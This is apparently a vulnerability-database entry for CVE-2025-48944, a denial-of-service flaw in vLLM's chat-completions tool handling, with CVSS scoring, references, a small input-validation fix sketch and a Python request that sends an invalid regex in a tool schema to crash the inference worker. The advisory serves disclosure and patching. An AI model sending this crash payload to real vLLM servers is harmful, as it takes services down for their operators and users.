CVE-2025-48944
MEDIUM (6.5)
Description
vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, so a single request can crash the inference worker. The worker remains down until it is restarted. Version 0.9.0 fixes the issue.
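The failure mode is easiest to see with a request sketch. The following is a minimal, hypothetical reproduction against a local vLLM deployment, assuming the default OpenAI-compatible server on port 8000 and a placeholder model name; the payload shape illustrates the advisory's description and is not a confirmed proof of concept. On affected versions, the unvalidated regex in the "pattern" field is compiled server-side and can take down the worker:

    import requests

    # Hypothetical reproduction sketch for CVE-2025-48944.
    # Assumptions: a vLLM server (>= 0.8.0, < 0.9.0) at localhost:8000 and
    # a placeholder model name; neither is taken from the advisory.
    payload = {
        "model": "example-model",
        "messages": [{"role": "user", "content": "hello"}],
        "tools": [{
            "type": "function",
            "function": {
                "name": "lookup",
                "description": "illustrative tool definition",
                "parameters": {
                    "type": "object",
                    "properties": {
                        # "((" is not a valid regex; on affected versions
                        # the "pattern" field is compiled unvalidated.
                        "query": {"type": "string", "pattern": "(("},
                    },
                },
            },
        }],
        "tool_choice": "auto",
    }

    resp = requests.post(
        "http://localhost:8000/v1/chat/completions",
        json=payload,
        timeout=30,
    )
    print(resp.status_code, resp.text[:200])

Because the crash happens in the worker rather than in request parsing, a low-privileged authenticated client is enough, which matches the PR:L/A:H vector below.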
CVE Details
CVSS v3.1 Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Published: 5/30/2025
Last Modified: 7/1/2025
Source: nvd
Honeypot Observations: 0
Affected Products
vllm:vllm
Weaknesses (CWE)
CWE-20
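CWE-20 is Improper Input Validation. As a rough illustration of the class of fix (the actual patch is in the pull request referenced below), here is a hedged sketch of pre-validating a client-supplied "pattern" field before it reaches any compilation step; the helper name is hypothetical:

    import re

    def validate_pattern_field(pattern: str) -> None:
        # Hypothetical pre-check: compile the client-supplied regex up
        # front and convert failures into a recoverable request error,
        # instead of letting an unguarded compile crash the worker.
        try:
            re.compile(pattern)
        except re.error as exc:
            raise ValueError(
                f"invalid 'pattern' in tool schema: {exc}"
            ) from exc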
References
https://github.com/vllm-project/vllm/pull/17623 (security-advisories@github.com)
https://github.com/vllm-project/vllm/security/advisories/GHSA-vrq3-r879-7m65 (security-advisories@github.com)
IOC Correlations
No correlations recorded.
This product uses data from the NVD API but is not endorsed or certified by the NVD.